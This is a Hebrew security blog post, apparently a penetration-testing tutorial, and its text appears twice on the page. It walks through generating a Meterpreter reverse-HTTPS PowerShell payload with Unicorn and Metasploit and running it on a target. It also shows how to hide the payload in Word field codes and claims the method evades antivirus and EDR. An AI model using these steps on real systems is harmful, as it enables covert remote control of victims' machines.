✕ סגור 
צור קשר
תודה על ההתעניינות .

Thank you! Your submission has been received!

Oops! Something went wrong while submitting the form

יצירת Payload באמצעות Unicorn

Eli Shlomo
|
Feb 26, 2019
alt="blogs"
alt="blogs"
alt="blogs"
Events
Event
title="Google"

יצירה של Payload מרתקת אותי בכל פעם מחדש, במיוחד במצבים בהם מזריקים את הקוד ישירות לזיכרון ועוקפים מערכות אנטי-וירוס ולעיתים מסוימות גם מערכות EDR.

ישנם כלים שונים בהם ניתן ליצור, להריץ ולעבוד עם Payload שונים כאשר הכלי הנפוץ כיום הוא Kali עם Metasploit, ובאופן אישי אני מעדיף ועובד ביומיום עם Kali על גבי Windows 10.

:לפני שנתחיל, הנה כמה מושגים כללים בשביל להבין מה אנו הולכים להריץ

מערכת Kali והכלים שניתנים להתקנה כדוגמת Metasploit מכילים כמות גדולה של Payload שמתאימים לתרחישים שונים, כאשר המטרה של Reverse Shell ושל Payload היא פשוטה: לקבל Shell. לעיתים ישנו כבר סשן ואין צורך ליצור Revere Shell.

במערכת Kali ישנם Payload שונים והמוכר שבהם הוא windows/meterpreter/reverse_tcp, למרות הפופלריות שלו ישנם Payload טובים יותר, כדוגמת windows/meterpreter/reverse_https עם מספר יתרונות: תווך מוצפן, לאחר ניתוק חלקי עדיין יודע לקבל מידע אודות הסשן, יותר קל למימוש.

Meterpreter – חלק מתוך Payload אשר מבצע פעולה הניתנת להרחבה באופן דינמי, לדוגמה, ניתן לבצע פעולות שונות ברמת הזיכרון ובמידת הצורך להרחיב ברמת תקשורת.

Payload – חלק מתוך Exploit ומכיל מידע מסוג metadata, ולמעשה הוא החלק שעובר אל היעד והטריגר להפעלה של קוד זדוני.

Exploit -הפעולה אשר מבצעת את ההפעלה ושולחת את המידע ותפקידה העיקרי הוא לנצל חולשה, לנצל הגדרה לא נכונה וכן הלאה, ולאחר מכן לאפשר גישה לנתונים על מנת לקבל הרשאות ומידע.

למעשה Meterpreter נמצא בתוך Metasploit ולכן אם עובדים מול מערכות Windows נשתמש בMeterpreter מסוג windows/meterpreter ובמידה עובדים עם מערכות לינוקס נשתמש linux/meterpreter וכן הלאה

אם למשל נריץ מתוך Kali את הפקודה show payloads נוכל לקבל רשימה ארוכה של Payload אשר נמצאים במערכת.

הכנה והרצה של Unicorn

כלי Unicorn הוא כלי פשוט המאפשר יצירה והרצה של PowerShell לטובת מתקפה מבוססת זיכרון שעוקפת אנטי-וירוס מקומי.

ע"י הרצה של הכלי ניתן ליצור קוד זדוני מבוסס PowerShell הניתן להרצה מתוך כלים שונים, החל מגרסאות Office שונות, באמצעות Cerutil וכן הלאה.

דרישות הכלי

• מערכת Kali מעודכנת (המאמר מבוסס על Kali על גבי Windows 10)

• כלי Metasploit Framework מותקן באופן מלא

• מחשב תקיפה עם מערכת Kali

• מחשב יעד מבוסס Windows 10 (אפשרי גם Windows Server)

Unicorn התקנת

מתוך ממשק Kali נשכפל את Unicorn לספריה חדשה באמצעות הפקודה הבאה

git clone https://github.com/trustedsec/unicorn

לאחר מכן נריץ את הפקודה הבאה

cd unicorn/

נוודא שהכלי Unicorn הותקן בהצלחה ע"י הפקודה הבאה

./unicorn.py –help

לאחר התקנה של Unicorn נתחילביצירת Payload מסוג Reverse HTTPS עם פרמטר של מחשב יעד וכן פורט רלוונטי.

./unicorn.pywindows/meterpreter/reverse_https 192.168.1.209 443

לאחר יצירת Payload נוצרים שני קבצים כאשר החשוב בהם הוא powershell_attack.txt ולמעשה הוא הקובץ שמכיל את הקוד הזדוני.

לאחר יצירת Payload נפעיל Metasploit בכדי להשתמש באותו Payload שיצרנו באמצעות הפקודה הבאה

msfconsole -r /opt/unicorn/unicorn.rc

בסיום נוכל לקחת את הקובץ powershell_attack.txt ולהתחיל בהרצה מול תחנת היעד, ניתן להפעיל את הקובץ בכמה צורות: הרצה של קובץ PowerShell, הזרקה לתוך קובץ Office, יצירה בתוך קובץ Macro וכן הלאה.

במידה ונריץ את הקובץ בתחנת ידע באמצעות PowerShell נוכל לקבל פלט של מספרים שונים, לאחר מכן נמשיך לבצע פעולות רגילות במחשב וביניהם גישה לפורט 443.

בצד השני של התוקף נוכל לראות את הגישה אשר נעשתה מתוך תחנת היעד ואת הסשן שנוצר, מכאן אנו יכולים לבצע פעולות שונות אל תחנת היעד.

במצב הזה התוקף מאזין לגישה שמבצעים בפורט 443

הערה: במצב של הפעלה הקבצים באמצעות PowerShell ובאמצעות Office מערכות האנטי-וירוס וכן מערכת EDR לא ביצעה זיהוי על הפעולות שבוצעו.

טיפ: הזרקה של הקוד לתוך קובץ וורד  

• מתוך קובץ Word חדש נבחר באפשרות Quick Parts

• לאחר מכן נבחר באפשרות Field

• לאחר מכן נבחר באפשרות Formula ונלחץ OK

• בתוך הקובץ יופיע הטקסט !Unexpected End of Formula

• בתוך הטקסט נבחר באפשרות Toggle Field Codes

•לסיום נעתיק את התוכן מתוך קובץ PowerShell ונשמור את הקובץ

כשנפתח את הקובץ לא נבחין בהתנהגות שונה, אך אם נאזין שוב במחשב תקיפה עם מערכת Kali באמצעות ממשק MSF נוכל לראות שנפתח סשן חדש, ואנו יכולים להתחיל בביצוע פעולות מתוך המחשב התוקף אל מחשב היעד.

MVP Security ,מאת: אלי שלמה

רוצים להתעדכן בתכנים נוספים בנושאי אבטחת מידע וסייבר? הירשמו עכשיו לניוזלטר שלנו ותמיד תישארו בעניינים > להרשמה

יצירה של Payload מרתקת אותי בכל פעם מחדש, במיוחד במצבים בהם מזריקים את הקוד ישירות לזיכרון ועוקפים מערכות אנטי-וירוס ולעיתים מסוימות גם מערכות EDR.

ישנם כלים שונים בהם ניתן ליצור, להריץ ולעבוד עם Payload שונים כאשר הכלי הנפוץ כיום הוא Kali עם Metasploit, ובאופן אישי אני מעדיף ועובד ביומיום עם Kali על גבי Windows 10.

:לפני שנתחיל, הנה כמה מושגים כללים בשביל להבין מה אנו הולכים להריץ

מערכת Kali והכלים שניתנים להתקנה כדוגמת Metasploit מכילים כמות גדולה של Payload שמתאימים לתרחישים שונים, כאשר המטרה של Reverse Shell ושל Payload היא פשוטה: לקבל Shell. לעיתים ישנו כבר סשן ואין צורך ליצור Revere Shell.

במערכת Kali ישנם Payload שונים והמוכר שבהם הוא windows/meterpreter/reverse_tcp, למרות הפופלריות שלו ישנם Payload טובים יותר, כדוגמת windows/meterpreter/reverse_https עם מספר יתרונות: תווך מוצפן, לאחר ניתוק חלקי עדיין יודע לקבל מידע אודות הסשן, יותר קל למימוש.

Meterpreter – חלק מתוך Payload אשר מבצע פעולה הניתנת להרחבה באופן דינמי, לדוגמה, ניתן לבצע פעולות שונות ברמת הזיכרון ובמידת הצורך להרחיב ברמת תקשורת.

Payload – חלק מתוך Exploit ומכיל מידע מסוג metadata, ולמעשה הוא החלק שעובר אל היעד והטריגר להפעלה של קוד זדוני.

Exploit -הפעולה אשר מבצעת את ההפעלה ושולחת את המידע ותפקידה העיקרי הוא לנצל חולשה, לנצל הגדרה לא נכונה וכן הלאה, ולאחר מכן לאפשר גישה לנתונים על מנת לקבל הרשאות ומידע.

למעשה Meterpreter נמצא בתוך Metasploit ולכן אם עובדים מול מערכות Windows נשתמש בMeterpreter מסוג windows/meterpreter ובמידה עובדים עם מערכות לינוקס נשתמש linux/meterpreter וכן הלאה

אם למשל נריץ מתוך Kali את הפקודה show payloads נוכל לקבל רשימה ארוכה של Payload אשר נמצאים במערכת.

הכנה והרצה של Unicorn

כלי Unicorn הוא כלי פשוט המאפשר יצירה והרצה של PowerShell לטובת מתקפה מבוססת זיכרון שעוקפת אנטי-וירוס מקומי.

ע"י הרצה של הכלי ניתן ליצור קוד זדוני מבוסס PowerShell הניתן להרצה מתוך כלים שונים, החל מגרסאות Office שונות, באמצעות Cerutil וכן הלאה.

דרישות הכלי

• מערכת Kali מעודכנת (המאמר מבוסס על Kali על גבי Windows 10)

• כלי Metasploit Framework מותקן באופן מלא

• מחשב תקיפה עם מערכת Kali

• מחשב יעד מבוסס Windows 10 (אפשרי גם Windows Server)

Unicorn התקנת

מתוך ממשק Kali נשכפל את Unicorn לספריה חדשה באמצעות הפקודה הבאה

git clone https://github.com/trustedsec/unicorn

לאחר מכן נריץ את הפקודה הבאה

cd unicorn/

נוודא שהכלי Unicorn הותקן בהצלחה ע"י הפקודה הבאה

./unicorn.py –help

לאחר התקנה של Unicorn נתחילביצירת Payload מסוג Reverse HTTPS עם פרמטר של מחשב יעד וכן פורט רלוונטי.

./unicorn.pywindows/meterpreter/reverse_https 192.168.1.209 443

לאחר יצירת Payload נוצרים שני קבצים כאשר החשוב בהם הוא powershell_attack.txt ולמעשה הוא הקובץ שמכיל את הקוד הזדוני.

לאחר יצירת Payload נפעיל Metasploit בכדי להשתמש באותו Payload שיצרנו באמצעות הפקודה הבאה

msfconsole -r /opt/unicorn/unicorn.rc

בסיום נוכל לקחת את הקובץ powershell_attack.txt ולהתחיל בהרצה מול תחנת היעד, ניתן להפעיל את הקובץ בכמה צורות: הרצה של קובץ PowerShell, הזרקה לתוך קובץ Office, יצירה בתוך קובץ Macro וכן הלאה.

במידה ונריץ את הקובץ בתחנת ידע באמצעות PowerShell נוכל לקבל פלט של מספרים שונים, לאחר מכן נמשיך לבצע פעולות רגילות במחשב וביניהם גישה לפורט 443.

בצד השני של התוקף נוכל לראות את הגישה אשר נעשתה מתוך תחנת היעד ואת הסשן שנוצר, מכאן אנו יכולים לבצע פעולות שונות אל תחנת היעד.

במצב הזה התוקף מאזין לגישה שמבצעים בפורט 443

הערה: במצב של הפעלה הקבצים באמצעות PowerShell ובאמצעות Office מערכות האנטי-וירוס וכן מערכת EDR לא ביצעה זיהוי על הפעולות שבוצעו.

טיפ: הזרקה של הקוד לתוך קובץ וורד  

• מתוך קובץ Word חדש נבחר באפשרות Quick Parts

• לאחר מכן נבחר באפשרות Field

• לאחר מכן נבחר באפשרות Formula ונלחץ OK

• בתוך הקובץ יופיע הטקסט !Unexpected End of Formula

• בתוך הטקסט נבחר באפשרות Toggle Field Codes

•לסיום נעתיק את התוכן מתוך קובץ PowerShell ונשמור את הקובץ

כשנפתח את הקובץ לא נבחין בהתנהגות שונה, אך אם נאזין שוב במחשב תקיפה עם מערכת Kali באמצעות ממשק MSF נוכל לראות שנפתח סשן חדש, ואנו יכולים להתחיל בביצוע פעולות מתוך המחשב התוקף אל מחשב היעד.

MVP Security ,מאת: אלי שלמה

רוצים להתעדכן בתכנים נוספים בנושאי אבטחת מידע וסייבר? הירשמו עכשיו לניוזלטר שלנו ותמיד תישארו בעניינים > להרשמה

לפרטים נוספים ויצירת קשר עם נציג אורקל

תודה הודעתך התקבלה

הודעתך לא התקבלה - נסה שוב מאוחר יותר

Eli Shlomo

הירשם לרשימת הדיוור של IsraelClouds

Thank you! Your submission has been received!

Oops! Something went wrong while submitting the form

מילון מונחיםהשירותים שלנו תנאי שימושהרשמה לניוזלטרמדיניות פרטיות